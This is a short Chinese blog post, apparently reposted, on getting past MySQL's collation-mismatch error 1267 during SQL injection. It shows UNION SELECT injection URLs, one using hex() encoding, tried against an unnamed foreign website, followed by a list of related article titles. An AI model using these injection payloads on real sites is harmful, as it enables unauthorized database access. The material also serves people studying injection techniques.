MySQL注射时ErrorNo.1267的突破
来源:互联网 发布:java html压缩成一行 编辑:程序博客网 时间:2024/04/30 06:09
本文作者:SuperHei
文章性质:原创
发布日期:2005-10-18
文章性质:原创
发布日期:2005-10-18
测试个国外的站时:
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
返回错误:
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
MySQL Error No. 126
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
解决办法:转为其他编码如hex。
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
成功得到hex(version())的值为:
342E312E332D62657461
回Mysql查询下得到:
mysql> select 0x342E312E332D62657461;
+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta |
+------------------------+
1 row in set (0.00 sec)
- MySQL注射时ErrorNo.1267的突破
- MySQL注射时ErrorNo.1267的突破
- mysql errorno 代号的各种含义
- 解决MySQL创建外键时ERROR 1005, errorno:150的错误
- 利用mysql的注射点得到更多mysql的信息
- mysql Error Code: 1005(errorno:121)解决
- php+mysql注射语句构造
- 关于MYSQL into outfile注射
- MYSQL into outfile注射---条件
- php+mysql注射语句构造
- 突破一流信息监控拦截系统进行SQL注射
- 突破一流信息监控拦截系统进行SQL注射
- 突破一流信息监控拦截系统进行SQL注射
- 突破一流信息监控拦截系统进行SQL注射
- SQL注射检测之突破存储过程进行sql注入
- 如何做is时是注射的游赵
- 程序打开文件意外终止的调试-基于errorno.h
- 程序打开文件意外终止的调试-基于errorno.h
- CGAL找不到"gmp-vc90-mt-gd.lib"和"mpfr-vc90-mt-gd.lib"
- 聚类分析
- 九月学习计划
- 深入浅出JBoss Seam
- PHP主机如何利用MYSQL提权
- MySQL注射时ErrorNo.1267的突破
- PHP+MySQL注入导出文件的新发现——附带IPB2的漏洞利用
- 一个简单的php在线端口扫描器
- 小议脚本变形
- Tomcat集成jboss核心类库,在Tomcat中部署EJB容器seam工程
- 如何让idhttp直接使用ie登录好的cookie来工作
- 使用iframe实现,点击JSP页面中的验证码刷新
- 直接调用类成员函数地址
- The 7 Elements of Highly Successful Software Projects